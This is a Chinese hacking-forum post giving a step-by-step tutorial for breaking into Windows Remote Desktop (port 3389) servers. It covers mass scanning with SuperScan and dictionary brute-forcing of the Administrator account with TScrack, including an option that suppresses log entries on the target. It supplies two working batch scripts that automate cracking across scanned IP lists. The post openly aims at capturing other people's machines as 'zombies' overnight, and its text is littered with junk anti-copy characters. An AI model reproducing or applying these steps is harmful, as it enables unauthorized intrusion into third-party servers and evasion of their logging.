QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2691|回复: 0
打印 上一主题 下一主题

终端服务真正的另类入侵

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 09:51 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

作者:霜风 QQ:14226581

3 y y1 b; @ }+ G0 a

终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。 " f2 H& O7 K b- X: x/ y这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: 6 u! a" N' x* H$ Y6 `) _0 b7 n) S P' I 首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下: 3 [4 Q9 R4 q- M( Z先打开superscan3如图1 & R, p& `% ~" y0 p3 t$ ^( u) X8 ^! Y+ C9 g- N 此主题相关图片如下:. ^. `8 P) ]) Y

" L1 Q# L1 i. p9 g1 C* k' q; `4 y

) T- N( d7 u8 L. H& N1 J9 J 接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图27 E1 y4 j: M1 r $ f: w2 p$ j0 \$ O此主题相关图片如下: 3 |* ~0 h+ a z- }. m. w9 d4 Q8 u5 Q: U" h$ ~- Y* v4 `

$ B7 Q0 R. e$ f) j4 |$ m- K( [

然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.3 ?2 |; T( X0 ^( ~1 i( l 这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图34 w8 d5 Q1 G, g+ `# O! Z# x % |; u& i8 N5 n, q 此主题相关图片如下: % Q. z( B0 \" r6 O/ }, w. \$ g# d

9 F$ E' y/ }* t4 H

" j( [( |" o, [7 m/ h# X& a“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。. d7 n+ e* i0 @6 N7 q 6 z* r& P" ?6 m* @0 p) j4 Q 此主题相关图片如下: 4 v4 x5 |) a# T5 ^- u S g* W

# m1 `5 q% C5 [/ T7 R$ v

接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5 ; {8 b+ ~) U& ?& | y. Y 2 Y: s: u5 Q0 U' ?- j! p' p+ r8 i此主题相关图片如下: " q- R0 s5 } W' I

- k% G* U# t7 ~# \$ K

进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。 7 i6 P' ? V3 L( d所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。* b- y6 b) f: F3 a" k& @. w TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。 ( L7 A3 Y, }' w- f$ B* j此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。) D' }3 `8 \9 r" e/ p 在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项: 5 L1 n1 \0 E' `7 f" e8 k/ L-h : Print usage help and exit 6 b0 s3 O* k$ N1 u& j3 R( N-V : Print version info and exit% Q+ F1 B+ \; m4 E# ]9 w -s : Print chipher strenght info and exit d! j' J8 {$ @% d0 A! N -b : Enable failed password beep1 e2 Z/ b0 p9 I$ [) `3 n6 p -t : Use two simultaneous connections [EXPERIMENTAL] ) r. @9 G1 J, W' w-N : Prevent System Log entries on targeted server ) |0 _3 L. i1 L# ]' r+ \7 B* h+ a-U : Uninstall tscrack and remove components 9 @( X- I$ _ ]" [; o! }-f <number> : Wordlist entry to start cracking with& E- v* s: ]5 {* T, m: \; a -F <delay> : Sampling Frequency (Delay between samples in ms) . u: M( s; H! P$ M6 l: |-l <user> : Account name to use, defaults to Administrator. ~5 v, j/ Y" H! s# F -w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted k' s* J0 G. r# c# P: X) W-p <password> : Use <password> to logon instead of wordlist/blank pass 0 s% p. U+ u" V# R! o1 ~* K-D <domain> : Specify domain to attempt logon to

7 f) j0 N4 G i' y0 Y3 E% C- `) e6 T9 j' a+ m# w 1 w) y( M; o# H' z我就帮忙翻译一下吧,翻译得不好可不要怪我啊: 9 x' y2 Q% d! n2 X! p5 W-h : 显示使用帮助然后退出1 b% q6 d1 U1 g( _ A! F2 f -V : 显示版本信息然后退出: ?+ @( f' B6 V0 h8 p$ k -s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明) - {- H4 o/ X$ v1 K% M2 W9 D3 ?2 I$ ]-b : 密码错误时发出声音 1 W! N) B1 Y$ `, e9 [6 B' Q-t : 同时发出多个连接,就是多线程。 ; H/ I) |, L; J' F7 C4 q1 C-N : Prevent System Log entries on targeted server $ r0 _7 ^' H6 v$ b1 o, F W5 | N-U : 卸载移除tscrack组件。- `' G, a+ b! S+ `3 D -f <number> : 使用-F后面的密码。 1 ^1 B1 w, e! \6 J: Y9 e-F <delay> : 间隔时间(频率) & ?' w& J2 v( X/ g; U( u* s-l <user> : 使用-L后面的用户名; c. M1 p ?; Z$ R -w <wordlist> : 使用-W后面的字典- Y7 S$ l% F9 V2 v+ Z$ K -p <password> : 使用-W后的密码 & X: q3 _$ ]5 ^-D <domain> : 登陆主页面?

' b* N, H% |. E% c9 ~) T" j7 B% B 相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本: ( S9 } ]- `& ^- _" ^- P, |) G" e@if not exist IpcScan.txt goto noscan& {' B9 g. F+ i. \, y @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i ; G; M0 S k9 M# n. M1 ]:noscan ' ^$ o9 r$ Q5 v2 q@echo 3389.txt no find or scan faild

+ V3 V8 A6 `1 g, L5 E+ i! Q4 l7 ^这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)

' X# k+ w6 d. g3 P8 a 保存后把后错名改为BAT就可以了。% I+ f$ _$ z2 [. X7 Z4 V 还写一个BAT,名字为HACK.BAT,代码如下:

& \; ~! B9 g1 L" U6 ^2 A4 c8 R @if not exist tscrack.exe goto noscan # f5 v2 D1 n' h8 k! S@tscrack %1 -l administartor -w pass.dic >>rouji.txt* _* [2 v. x' {2 B9 m! }2 c :noscan& O3 l1 I* |; ]9 l& P3 r& z @echo tscrack.exe no find or scan faild

" o- \/ T3 m7 I5 O+ Y- o 这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC 8 @& ]1 w, v( u- L* m/ I制作方法如上。 + O5 ^/ H5 S+ q然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图60 n) B! ^/ C4 X' f8 {7 q5 A% H & E/ ]& n# c0 _: `1 \1 t% o+ l 此主题相关图片如下: / {8 A5 n F- k, [) B8 a7 a

怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic., K7 n$ E% s3 m/ e' O 最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7- Y1 }' w& F$ n# Q: c h + y! H4 ]9 F8 w ? Z5 V) A 此主题相关图片如下: 3 x6 O g! q( R$ Z+ v 5 S' l7 }, j: [: |怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic. . c& ?- n3 k& n f# U i最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-8-30 17:41 , Processed in 0.306112 second(s), 51 queries .

回顶部